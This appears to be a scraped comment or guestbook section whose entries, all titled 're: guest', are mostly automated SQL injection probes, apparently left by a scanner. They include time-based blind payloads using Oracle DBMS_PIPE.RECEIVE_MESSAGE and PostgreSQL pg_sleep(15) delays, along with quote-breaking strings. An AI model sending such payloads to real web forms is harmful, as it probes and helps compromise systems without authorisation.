re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@EbVVx
re: guest
1
re: guest
1
re: guest
1
re: guest
1
re: guest
1
re: guest
1